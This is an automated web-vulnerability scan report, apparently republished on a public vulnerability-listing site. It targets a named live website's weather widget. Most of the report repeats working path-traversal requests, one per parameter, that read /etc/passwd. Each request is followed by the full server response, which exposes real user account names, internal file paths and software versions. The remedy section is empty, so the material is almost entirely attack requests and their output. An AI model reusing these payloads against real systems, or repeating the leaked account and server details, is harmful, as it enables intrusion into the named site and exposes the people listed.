LFI, XSS, DORK, GHDB ibegin.com REPORT SUMMARY

Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search

Loading
Netsparker - Scan Report Summary
TARGET URL
 http://www.ibegin.com/weather/weather_widget....
SCAN DATE
 5/2/2011 10:39:24 AM
REPORT DATE
 5/2/2011 12:11:13 PM
SCAN DURATION
 00:01:38

Total Requests

Average Speed

req/sec.
19
identified
16
confirmed
0
critical
1
informational

DORK TESTS

DORK TESTS
PROFILE
 Previous Settings
ENABLED ENGINES
 Static Tests, Find Backup Files, Blind Command Injection, Blind SQL Injection, Boolean SQL Injection, Command Injection, HTTP Header Injection, Local File Inclusion, Open Redirection, Remote Code Evaluation, Remote File Inclusion, SQL Injection, Cross-site Scripting
Authentication
Scheduled

VULNERABILITIES

Vulnerabilities
Netsparker - Web Application Security Scanner
IMPORTANT
84 %
LOW
11 %
INFORMATION
5 %

VULNERABILITY SUMMARY

Vulnerability Summary
URL Parameter Method Vulnerability Confirmed
/weather/weather_widget.php type GET Local File Inclusion Yes
country GET Local File Inclusion Yes
state GET Local File Inclusion Yes
city GET Local File Inclusion Yes
smallicon GET Local File Inclusion Yes
current GET Local File Inclusion Yes
forecast GET Local File Inclusion Yes
background_color GET Local File Inclusion Yes
color GET Local File Inclusion Yes
width GET Local File Inclusion Yes
padding GET Local File Inclusion Yes
border_width GET Local File Inclusion Yes
border_color GET Local File Inclusion Yes
font_size GET Local File Inclusion Yes
font_family GET Local File Inclusion Yes
showicons GET Local File Inclusion Yes
Apache Version Disclosure No
PHP Version Disclosure No
[Possible] Internal Path Leakage (*nix) No
Local File Inclusion

Local File Inclusion
16 TOTAL
IMPORTANT
CONFIRMED
16
A Local File Inclusion (LFI) vulnerability occurs when a file from the target system is injected into the attacked server page. Netsparker confirmed this issue by reading some files from the target web server.

Impact

Impact can differ based on the exploitation and the read permission of the web server user. Depending on these factors an attacker might carry out one or more of the following attacks:

Remedy

- /weather/weather_widget.php

/weather/weather_widget.php CONFIRMED

http://www.ibegin.com/weather/weather_widget.php?type=../../../../../../../../../../../etc/passwd%00..

Parameters

Parameter Type Value
type GET ../../../../../../../../../../../etc/passwdweather_widget.php
country GET us
state GET Virginia
city GET Reston
smallicon GET 1
current GET 1
forecast GET 1
background_color GET ffffffffffff
color GET 000000
width GET 175
padding GET 10
border_width GET 1
border_color GET 000000
font_size GET 11
font_family GET Verdana
showicons GET 1

Request

GET /weather/weather_widget.php?type=../../../../../../../../../../../etc/passwd%00weather_widget.php&country=us&state=Virginia&city=Reston&smallicon=1&current=1&forecast=1&background_color=ffffffffffff&color=000000&width=175&padding=10&border_width=1&border_color=000000&font_size=11&font_family=Verdana&showicons=1 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.ibegin.com
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 10:39:28 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 568
Content-Type: text/html


Notice: Undefined index: old in /home/ibegin.com/public_html/weather/weather_widget.php on line 24Notice: Undefined index: measure in /home/ibegin.com/public_html/weather/weather_widget.php on line 64Notice: Undefined index: measure in /home/ibegin.com/public_html/weather/weather_widget.php on line 64root:x:0:0:root:/root:/bin/bashdaemon:x:1:1:daemon:/usr/sbin:/bin/shbin:x:2:2:bin:/bin:/bin/shsys:x:3:3:sys:/dev:/bin/shsync:x:4:65534:sync:/bin:/bin/syncgames:x:5:60:games:/usr/games:/bin/shman:x:6:12:man:/var/cache/man:/bin/shlp:x:7:7:lp:/var/spool/lpd:/bin/shmail:x:8:8:mail:/var/mail:/bin/shnews:x:9:9:news:/var/spool/news:/bin/shuucp:x:10:10:uucp:/var/spool/uucp:/bin/shproxy:x:13:13:proxy:/bin:/bin/shwww-data:x:33:33:www-data:/var/www:/bin/shbackup:x:34:34:backup:/var/backups:/bin/shlist:x:38:38:Mailing List Manager:/var/list:/bin/shirc:x:39:39:ircd:/var/run/ircd:/bin/shgnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/shnobody:x:65534:65534:nobody:/nonexistent:/bin/shlibuuid:x:100:101::/var/lib/libuuid:/bin/shsyslog:x:101:103::/home/syslog:/bin/falsesshd:x:102:65534::/var/run/sshd:/usr/sbin/nologinjphilp:x:1000:1000:Jason Philp,,,:/home/jphilp:/bin/bashafarooq:x:1001:1001:Ahmed Farooq,,,:/home/afarooq:/bin/bashpostfix:x:103:106::/var/spool/postfix:/bin/falsedealwatch:x:1002:1003:,,,:/home/dealwatch:/bin/bash
- /weather/weather_widget.php

/weather/weather_widget.php CONFIRMED

http://www.ibegin.com/weather/weather_widget.php?type=js&country=../../../../../../../../../../../et..

Parameters

Parameter Type Value
type GET js
country GET ../../../../../../../../../../../etc/passwdweather_widget.php
state GET Virginia
city GET Reston
smallicon GET 1
current GET 1
forecast GET 1
background_color GET ffffffffffff
color GET 000000
width GET 175
padding GET 10
border_width GET 1
border_color GET 000000
font_size GET 11
font_family GET Verdana
showicons GET 1

Request

GET /weather/weather_widget.php?type=js&country=../../../../../../../../../../../etc/passwd%00weather_widget.php&state=Virginia&city=Reston&smallicon=1&current=1&forecast=1&background_color=ffffffffffff&color=000000&width=175&padding=10&border_width=1&border_color=000000&font_size=11&font_family=Verdana&showicons=1 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.ibegin.com
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 10:39:29 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 568
Content-Type: text/html


Notice: Undefined index: old in /home/ibegin.com/public_html/weather/weather_widget.php on line 24Notice: Undefined index: measure in /home/ibegin.com/public_html/weather/weather_widget.php on line 64Notice: Undefined index: measure in /home/ibegin.com/public_html/weather/weather_widget.php on line 64root:x:0:0:root:/root:/bin/bashdaemon:x:1:1:daemon:/usr/sbin:/bin/shbin:x:2:2:bin:/bin:/bin/shsys:x:3:3:sys:/dev:/bin/shsync:x:4:65534:sync:/bin:/bin/syncgames:x:5:60:games:/usr/games:/bin/shman:x:6:12:man:/var/cache/man:/bin/shlp:x:7:7:lp:/var/spool/lpd:/bin/shmail:x:8:8:mail:/var/mail:/bin/shnews:x:9:9:news:/var/spool/news:/bin/shuucp:x:10:10:uucp:/var/spool/uucp:/bin/shproxy:x:13:13:proxy:/bin:/bin/shwww-data:x:33:33:www-data:/var/www:/bin/shbackup:x:34:34:backup:/var/backups:/bin/shlist:x:38:38:Mailing List Manager:/var/list:/bin/shirc:x:39:39:ircd:/var/run/ircd:/bin/shgnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/shnobody:x:65534:65534:nobody:/nonexistent:/bin/shlibuuid:x:100:101::/var/lib/libuuid:/bin/shsyslog:x:101:103::/home/syslog:/bin/falsesshd:x:102:65534::/var/run/sshd:/usr/sbin/nologinjphilp:x:1000:1000:Jason Philp,,,:/home/jphilp:/bin/bashafarooq:x:1001:1001:Ahmed Farooq,,,:/home/afarooq:/bin/bashpostfix:x:103:106::/var/spool/postfix:/bin/falsedealwatch:x:1002:1003:,,,:/home/dealwatch:/bin/bash
- /weather/weather_widget.php

/weather/weather_widget.php CONFIRMED

http://www.ibegin.com/weather/weather_widget.php?type=js&country=us&state=../../../../../../../../....

Parameters

Parameter Type Value
type GET js
country GET us
state GET ../../../../../../../../../../../etc/passwdweather_widget.php
city GET Reston
smallicon GET 1
current GET 1
forecast GET 1
background_color GET ffffffffffff
color GET 000000
width GET 175
padding GET 10
border_width GET 1
border_color GET 000000
font_size GET 11
font_family GET Verdana
showicons GET 1

Request

GET /weather/weather_widget.php?type=js&country=us&state=../../../../../../../../../../../etc/passwd%00weather_widget.php&city=Reston&smallicon=1&current=1&forecast=1&background_color=ffffffffffff&color=000000&width=175&padding=10&border_width=1&border_color=000000&font_size=11&font_family=Verdana&showicons=1 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.ibegin.com
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 10:39:30 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 568
Content-Type: text/html


Notice: Undefined index: old in /home/ibegin.com/public_html/weather/weather_widget.php on line 24Notice: Undefined index: measure in /home/ibegin.com/public_html/weather/weather_widget.php on line 64Notice: Undefined index: measure in /home/ibegin.com/public_html/weather/weather_widget.php on line 64root:x:0:0:root:/root:/bin/bashdaemon:x:1:1:daemon:/usr/sbin:/bin/shbin:x:2:2:bin:/bin:/bin/shsys:x:3:3:sys:/dev:/bin/shsync:x:4:65534:sync:/bin:/bin/syncgames:x:5:60:games:/usr/games:/bin/shman:x:6:12:man:/var/cache/man:/bin/shlp:x:7:7:lp:/var/spool/lpd:/bin/shmail:x:8:8:mail:/var/mail:/bin/shnews:x:9:9:news:/var/spool/news:/bin/shuucp:x:10:10:uucp:/var/spool/uucp:/bin/shproxy:x:13:13:proxy:/bin:/bin/shwww-data:x:33:33:www-data:/var/www:/bin/shbackup:x:34:34:backup:/var/backups:/bin/shlist:x:38:38:Mailing List Manager:/var/list:/bin/shirc:x:39:39:ircd:/var/run/ircd:/bin/shgnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/shnobody:x:65534:65534:nobody:/nonexistent:/bin/shlibuuid:x:100:101::/var/lib/libuuid:/bin/shsyslog:x:101:103::/home/syslog:/bin/falsesshd:x:102:65534::/var/run/sshd:/usr/sbin/nologinjphilp:x:1000:1000:Jason Philp,,,:/home/jphilp:/bin/bashafarooq:x:1001:1001:Ahmed Farooq,,,:/home/afarooq:/bin/bashpostfix:x:103:106::/var/spool/postfix:/bin/falsedealwatch:x:1002:1003:,,,:/home/dealwatch:/bin/bash
- /weather/weather_widget.php

/weather/weather_widget.php CONFIRMED

http://www.ibegin.com/weather/weather_widget.php?type=js&country=us&state=Virginia&city=../../../../..

Parameters

Parameter Type Value
type GET js
country GET us
state GET Virginia
city GET ../../../../../../../../../../../etc/passwdweather_widget.php
smallicon GET 1
current GET 1
forecast GET 1
background_color GET ffffffffffff
color GET 000000
width GET 175
padding GET 10
border_width GET 1
border_color GET 000000
font_size GET 11
font_family GET Verdana
showicons GET 1

Request

GET /weather/weather_widget.php?type=js&country=us&state=Virginia&city=../../../../../../../../../../../etc/passwd%00weather_widget.php&smallicon=1&current=1&forecast=1&background_color=ffffffffffff&color=000000&width=175&padding=10&border_width=1&border_color=000000&font_size=11&font_family=Verdana&showicons=1 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.ibegin.com
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 10:39:31 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 568
Content-Type: text/html


Notice: Undefined index: old in /home/ibegin.com/public_html/weather/weather_widget.php on line 24Notice: Undefined index: measure in /home/ibegin.com/public_html/weather/weather_widget.php on line 64Notice: Undefined index: measure in /home/ibegin.com/public_html/weather/weather_widget.php on line 64root:x:0:0:root:/root:/bin/bashdaemon:x:1:1:daemon:/usr/sbin:/bin/shbin:x:2:2:bin:/bin:/bin/shsys:x:3:3:sys:/dev:/bin/shsync:x:4:65534:sync:/bin:/bin/syncgames:x:5:60:games:/usr/games:/bin/shman:x:6:12:man:/var/cache/man:/bin/shlp:x:7:7:lp:/var/spool/lpd:/bin/shmail:x:8:8:mail:/var/mail:/bin/shnews:x:9:9:news:/var/spool/news:/bin/shuucp:x:10:10:uucp:/var/spool/uucp:/bin/shproxy:x:13:13:proxy:/bin:/bin/shwww-data:x:33:33:www-data:/var/www:/bin/shbackup:x:34:34:backup:/var/backups:/bin/shlist:x:38:38:Mailing List Manager:/var/list:/bin/shirc:x:39:39:ircd:/var/run/ircd:/bin/shgnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/shnobody:x:65534:65534:nobody:/nonexistent:/bin/shlibuuid:x:100:101::/var/lib/libuuid:/bin/shsyslog:x:101:103::/home/syslog:/bin/falsesshd:x:102:65534::/var/run/sshd:/usr/sbin/nologinjphilp:x:1000:1000:Jason Philp,,,:/home/jphilp:/bin/bashafarooq:x:1001:1001:Ahmed Farooq,,,:/home/afarooq:/bin/bashpostfix:x:103:106::/var/spool/postfix:/bin/falsedealwatch:x:1002:1003:,,,:/home/dealwatch:/bin/bash
- /weather/weather_widget.php

/weather/weather_widget.php CONFIRMED

http://www.ibegin.com/weather/weather_widget.php?type=js&country=us&state=Virginia&city=Reston&small..

Parameters

Parameter Type Value
type GET js
country GET us
state GET Virginia
city GET Reston
smallicon GET ../../../../../../../../../../../etc/passwdweather_widget.php
current GET 1
forecast GET 1
background_color GET ffffffffffff
color GET 000000
width GET 175
padding GET 10
border_width GET 1
border_color GET 000000
font_size GET 11
font_family GET Verdana
showicons GET 1

Request

GET /weather/weather_widget.php?type=js&country=us&state=Virginia&city=Reston&smallicon=../../../../../../../../../../../etc/passwd%00weather_widget.php&current=1&forecast=1&background_color=ffffffffffff&color=000000&width=175&padding=10&border_width=1&border_color=000000&font_size=11&font_family=Verdana&showicons=1 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.ibegin.com
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 10:39:32 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 568
Content-Type: text/html


Notice: Undefined index: old in /home/ibegin.com/public_html/weather/weather_widget.php on line 24Notice: Undefined index: measure in /home/ibegin.com/public_html/weather/weather_widget.php on line 64Notice: Undefined index: measure in /home/ibegin.com/public_html/weather/weather_widget.php on line 64root:x:0:0:root:/root:/bin/bashdaemon:x:1:1:daemon:/usr/sbin:/bin/shbin:x:2:2:bin:/bin:/bin/shsys:x:3:3:sys:/dev:/bin/shsync:x:4:65534:sync:/bin:/bin/syncgames:x:5:60:games:/usr/games:/bin/shman:x:6:12:man:/var/cache/man:/bin/shlp:x:7:7:lp:/var/spool/lpd:/bin/shmail:x:8:8:mail:/var/mail:/bin/shnews:x:9:9:news:/var/spool/news:/bin/shuucp:x:10:10:uucp:/var/spool/uucp:/bin/shproxy:x:13:13:proxy:/bin:/bin/shwww-data:x:33:33:www-data:/var/www:/bin/shbackup:x:34:34:backup:/var/backups:/bin/shlist:x:38:38:Mailing List Manager:/var/list:/bin/shirc:x:39:39:ircd:/var/run/ircd:/bin/shgnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/shnobody:x:65534:65534:nobody:/nonexistent:/bin/shlibuuid:x:100:101::/var/lib/libuuid:/bin/shsyslog:x:101:103::/home/syslog:/bin/falsesshd:x:102:65534::/var/run/sshd:/usr/sbin/nologinjphilp:x:1000:1000:Jason Philp,,,:/home/jphilp:/bin/bashafarooq:x:1001:1001:Ahmed Farooq,,,:/home/afarooq:/bin/bashpostfix:x:103:106::/var/spool/postfix:/bin/falsedealwatch:x:1002:1003:,,,:/home/dealwatch:/bin/bash
- /weather/weather_widget.php

/weather/weather_widget.php CONFIRMED

http://www.ibegin.com/weather/weather_widget.php?type=js&country=us&state=Virginia&city=Reston&small..

Parameters

Parameter Type Value
type GET js
country GET us
state GET Virginia
city GET Reston
smallicon GET 1
current GET ../../../../../../../../../../../etc/passwdweather_widget.php
forecast GET 1
background_color GET ffffffffffff
color GET 000000
width GET 175
padding GET 10
border_width GET 1
border_color GET 000000
font_size GET 11
font_family GET Verdana
showicons GET 1

Request

GET /weather/weather_widget.php?type=js&country=us&state=Virginia&city=Reston&smallicon=1&current=../../../../../../../../../../../etc/passwd%00weather_widget.php&forecast=1&background_color=ffffffffffff&color=000000&width=175&padding=10&border_width=1&border_color=000000&font_size=11&font_family=Verdana&showicons=1 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.ibegin.com
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 10:39:33 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 568
Content-Type: text/html


Notice: Undefined index: old in /home/ibegin.com/public_html/weather/weather_widget.php on line 24Notice: Undefined index: measure in /home/ibegin.com/public_html/weather/weather_widget.php on line 64Notice: Undefined index: measure in /home/ibegin.com/public_html/weather/weather_widget.php on line 64root:x:0:0:root:/root:/bin/bashdaemon:x:1:1:daemon:/usr/sbin:/bin/shbin:x:2:2:bin:/bin:/bin/shsys:x:3:3:sys:/dev:/bin/shsync:x:4:65534:sync:/bin:/bin/syncgames:x:5:60:games:/usr/games:/bin/shman:x:6:12:man:/var/cache/man:/bin/shlp:x:7:7:lp:/var/spool/lpd:/bin/shmail:x:8:8:mail:/var/mail:/bin/shnews:x:9:9:news:/var/spool/news:/bin/shuucp:x:10:10:uucp:/var/spool/uucp:/bin/shproxy:x:13:13:proxy:/bin:/bin/shwww-data:x:33:33:www-data:/var/www:/bin/shbackup:x:34:34:backup:/var/backups:/bin/shlist:x:38:38:Mailing List Manager:/var/list:/bin/shirc:x:39:39:ircd:/var/run/ircd:/bin/shgnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/shnobody:x:65534:65534:nobody:/nonexistent:/bin/shlibuuid:x:100:101::/var/lib/libuuid:/bin/shsyslog:x:101:103::/home/syslog:/bin/falsesshd:x:102:65534::/var/run/sshd:/usr/sbin/nologinjphilp:x:1000:1000:Jason Philp,,,:/home/jphilp:/bin/bashafarooq:x:1001:1001:Ahmed Farooq,,,:/home/afarooq:/bin/bashpostfix:x:103:106::/var/spool/postfix:/bin/falsedealwatch:x:1002:1003:,,,:/home/dealwatch:/bin/bash
- /weather/weather_widget.php

/weather/weather_widget.php CONFIRMED

http://www.ibegin.com/weather/weather_widget.php?type=js&country=us&state=Virginia&city=Reston&small..

Parameters

Parameter Type Value
type GET js
country GET us
state GET Virginia
city GET Reston
smallicon GET 1
current GET 1
forecast GET ../../../../../../../../../../../etc/passwdweather_widget.php
background_color GET ffffffffffff
color GET 000000
width GET 175
padding GET 10
border_width GET 1
border_color GET 000000
font_size GET 11
font_family GET Verdana
showicons GET 1

Request

GET /weather/weather_widget.php?type=js&country=us&state=Virginia&city=Reston&smallicon=1&current=1&forecast=../../../../../../../../../../../etc/passwd%00weather_widget.php&background_color=ffffffffffff&color=000000&width=175&padding=10&border_width=1&border_color=000000&font_size=11&font_family=Verdana&showicons=1 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.ibegin.com
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 10:39:34 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 568
Content-Type: text/html


Notice: Undefined index: old in /home/ibegin.com/public_html/weather/weather_widget.php on line 24Notice: Undefined index: measure in /home/ibegin.com/public_html/weather/weather_widget.php on line 64Notice: Undefined index: measure in /home/ibegin.com/public_html/weather/weather_widget.php on line 64root:x:0:0:root:/root:/bin/bashdaemon:x:1:1:daemon:/usr/sbin:/bin/shbin:x:2:2:bin:/bin:/bin/shsys:x:3:3:sys:/dev:/bin/shsync:x:4:65534:sync:/bin:/bin/syncgames:x:5:60:games:/usr/games:/bin/shman:x:6:12:man:/var/cache/man:/bin/shlp:x:7:7:lp:/var/spool/lpd:/bin/shmail:x:8:8:mail:/var/mail:/bin/shnews:x:9:9:news:/var/spool/news:/bin/shuucp:x:10:10:uucp:/var/spool/uucp:/bin/shproxy:x:13:13:proxy:/bin:/bin/shwww-data:x:33:33:www-data:/var/www:/bin/shbackup:x:34:34:backup:/var/backups:/bin/shlist:x:38:38:Mailing List Manager:/var/list:/bin/shirc:x:39:39:ircd:/var/run/ircd:/bin/shgnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/shnobody:x:65534:65534:nobody:/nonexistent:/bin/shlibuuid:x:100:101::/var/lib/libuuid:/bin/shsyslog:x:101:103::/home/syslog:/bin/falsesshd:x:102:65534::/var/run/sshd:/usr/sbin/nologinjphilp:x:1000:1000:Jason Philp,,,:/home/jphilp:/bin/bashafarooq:x:1001:1001:Ahmed Farooq,,,:/home/afarooq:/bin/bashpostfix:x:103:106::/var/spool/postfix:/bin/falsedealwatch:x:1002:1003:,,,:/home/dealwatch:/bin/bash
- /weather/weather_widget.php

/weather/weather_widget.php CONFIRMED

http://www.ibegin.com/weather/weather_widget.php?type=js&country=us&state=Virginia&city=Reston&small..

Parameters

Parameter Type Value
type GET js
country GET us
state GET Virginia
city GET Reston
smallicon GET 1
current GET 1
forecast GET 1
background_color GET ../../../../../../../../../../../etc/passwdweather_widget.php
color GET 000000
width GET 175
padding GET 10
border_width GET 1
border_color GET 000000
font_size GET 11
font_family GET Verdana
showicons GET 1

Request

GET /weather/weather_widget.php?type=js&country=us&state=Virginia&city=Reston&smallicon=1&current=1&forecast=1&background_color=../../../../../../../../../../../etc/passwd%00weather_widget.php&color=000000&width=175&padding=10&border_width=1&border_color=000000&font_size=11&font_family=Verdana&showicons=1 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.ibegin.com
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 10:39:35 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 568
Content-Type: text/html


Notice: Undefined index: old in /home/ibegin.com/public_html/weather/weather_widget.php on line 24Notice: Undefined index: measure in /home/ibegin.com/public_html/weather/weather_widget.php on line 64Notice: Undefined index: measure in /home/ibegin.com/public_html/weather/weather_widget.php on line 64root:x:0:0:root:/root:/bin/bashdaemon:x:1:1:daemon:/usr/sbin:/bin/shbin:x:2:2:bin:/bin:/bin/shsys:x:3:3:sys:/dev:/bin/shsync:x:4:65534:sync:/bin:/bin/syncgames:x:5:60:games:/usr/games:/bin/shman:x:6:12:man:/var/cache/man:/bin/shlp:x:7:7:lp:/var/spool/lpd:/bin/shmail:x:8:8:mail:/var/mail:/bin/shnews:x:9:9:news:/var/spool/news:/bin/shuucp:x:10:10:uucp:/var/spool/uucp:/bin/shproxy:x:13:13:proxy:/bin:/bin/shwww-data:x:33:33:www-data:/var/www:/bin/shbackup:x:34:34:backup:/var/backups:/bin/shlist:x:38:38:Mailing List Manager:/var/list:/bin/shirc:x:39:39:ircd:/var/run/ircd:/bin/shgnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/shnobody:x:65534:65534:nobody:/nonexistent:/bin/shlibuuid:x:100:101::/var/lib/libuuid:/bin/shsyslog:x:101:103::/home/syslog:/bin/falsesshd:x:102:65534::/var/run/sshd:/usr/sbin/nologinjphilp:x:1000:1000:Jason Philp,,,:/home/jphilp:/bin/bashafarooq:x:1001:1001:Ahmed Farooq,,,:/home/afarooq:/bin/bashpostfix:x:103:106::/var/spool/postfix:/bin/falsedealwatch:x:1002:1003:,,,:/home/dealwatch:/bin/bash
- /weather/weather_widget.php

/weather/weather_widget.php CONFIRMED

http://www.ibegin.com/weather/weather_widget.php?type=js&country=us&state=Virginia&city=Reston&small..

Parameters

Parameter Type Value
type GET js
country GET us
state GET Virginia
city GET Reston
smallicon GET 1
current GET 1
forecast GET 1
background_color GET ffffffffffff
color GET ../../../../../../../../../../../etc/passwdweather_widget.php
width GET 175
padding GET 10
border_width GET 1
border_color GET 000000
font_size GET 11
font_family GET Verdana
showicons GET 1

Request

GET /weather/weather_widget.php?type=js&country=us&state=Virginia&city=Reston&smallicon=1&current=1&forecast=1&background_color=ffffffffffff&color=../../../../../../../../../../../etc/passwd%00weather_widget.php&width=175&padding=10&border_width=1&border_color=000000&font_size=11&font_family=Verdana&showicons=1 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.ibegin.com
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 10:39:36 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 568
Content-Type: text/html


Notice: Undefined index: old in /home/ibegin.com/public_html/weather/weather_widget.php on line 24Notice: Undefined index: measure in /home/ibegin.com/public_html/weather/weather_widget.php on line 64Notice: Undefined index: measure in /home/ibegin.com/public_html/weather/weather_widget.php on line 64root:x:0:0:root:/root:/bin/bashdaemon:x:1:1:daemon:/usr/sbin:/bin/shbin:x:2:2:bin:/bin:/bin/shsys:x:3:3:sys:/dev:/bin/shsync:x:4:65534:sync:/bin:/bin/syncgames:x:5:60:games:/usr/games:/bin/shman:x:6:12:man:/var/cache/man:/bin/shlp:x:7:7:lp:/var/spool/lpd:/bin/shmail:x:8:8:mail:/var/mail:/bin/shnews:x:9:9:news:/var/spool/news:/bin/shuucp:x:10:10:uucp:/var/spool/uucp:/bin/shproxy:x:13:13:proxy:/bin:/bin/shwww-data:x:33:33:www-data:/var/www:/bin/shbackup:x:34:34:backup:/var/backups:/bin/shlist:x:38:38:Mailing List Manager:/var/list:/bin/shirc:x:39:39:ircd:/var/run/ircd:/bin/shgnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/shnobody:x:65534:65534:nobody:/nonexistent:/bin/shlibuuid:x:100:101::/var/lib/libuuid:/bin/shsyslog:x:101:103::/home/syslog:/bin/falsesshd:x:102:65534::/var/run/sshd:/usr/sbin/nologinjphilp:x:1000:1000:Jason Philp,,,:/home/jphilp:/bin/bashafarooq:x:1001:1001:Ahmed Farooq,,,:/home/afarooq:/bin/bashpostfix:x:103:106::/var/spool/postfix:/bin/falsedealwatch:x:1002:1003:,,,:/home/dealwatch:/bin/bash
- /weather/weather_widget.php

/weather/weather_widget.php CONFIRMED

http://www.ibegin.com/weather/weather_widget.php?type=js&country=us&state=Virginia&city=Reston&small..

Parameters

Parameter Type Value
type GET js
country GET us
state GET Virginia
city GET Reston
smallicon GET 1
current GET 1
forecast GET 1
background_color GET ffffffffffff
color GET 000000
width GET ../../../../../../../../../../../etc/passwdweather_widget.php
padding GET 10
border_width GET 1
border_color GET 000000
font_size GET 11
font_family GET Verdana
showicons GET 1

Request

GET /weather/weather_widget.php?type=js&country=us&state=Virginia&city=Reston&smallicon=1&current=1&forecast=1&background_color=ffffffffffff&color=000000&width=../../../../../../../../../../../etc/passwd%00weather_widget.php&padding=10&border_width=1&border_color=000000&font_size=11&font_family=Verdana&showicons=1 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.ibegin.com
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 10:39:37 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 568
Content-Type: text/html


Notice: Undefined index: old in /home/ibegin.com/public_html/weather/weather_widget.php on line 24Notice: Undefined index: measure in /home/ibegin.com/public_html/weather/weather_widget.php on line 64Notice: Undefined index: measure in /home/ibegin.com/public_html/weather/weather_widget.php on line 64root:x:0:0:root:/root:/bin/bashdaemon:x:1:1:daemon:/usr/sbin:/bin/shbin:x:2:2:bin:/bin:/bin/shsys:x:3:3:sys:/dev:/bin/shsync:x:4:65534:sync:/bin:/bin/syncgames:x:5:60:games:/usr/games:/bin/shman:x:6:12:man:/var/cache/man:/bin/shlp:x:7:7:lp:/var/spool/lpd:/bin/shmail:x:8:8:mail:/var/mail:/bin/shnews:x:9:9:news:/var/spool/news:/bin/shuucp:x:10:10:uucp:/var/spool/uucp:/bin/shproxy:x:13:13:proxy:/bin:/bin/shwww-data:x:33:33:www-data:/var/www:/bin/shbackup:x:34:34:backup:/var/backups:/bin/shlist:x:38:38:Mailing List Manager:/var/list:/bin/shirc:x:39:39:ircd:/var/run/ircd:/bin/shgnats:x:41:41:Gnats Bug-Reporting System 